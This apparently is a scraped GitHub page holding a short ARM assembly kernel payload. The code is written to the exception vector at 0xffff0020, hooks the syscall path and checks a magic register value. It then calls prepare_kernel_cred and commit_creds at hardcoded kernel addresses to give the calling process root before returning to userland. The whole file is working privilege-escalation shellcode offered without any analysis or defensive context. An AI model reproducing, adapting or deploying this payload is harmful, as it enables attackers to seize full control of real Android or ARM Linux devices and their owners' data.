Skip to content
Go to file
Cannot retrieve contributors at this time
26 lines (21 sloc) 628 Bytes
This code will be written to 0xffff0020
It elevates the privileges of the calling process and
returns to userland
@ check if magic
cmp r7, #0xb0000000
bne exit
stmfd sp!,{r0-r12}
mov r0, #0
@ldr r3, =0xc0049a00 @ prepare_kernel_cred
ldr r3, =0xc006d980 @ prepare_kernel_cred
blx r3
@ldr r4, =0xc0049438 @ commit_creds
ldr r4, =0xc006d3c4 @ commit_creds
blx r4
ldmfd sp!, {r0-r12, pc}^ @ return to userland
@ go to syscall handler
ldr pc, [pc, #980] @ go to normal swi handler
You can’t perform that action at this time.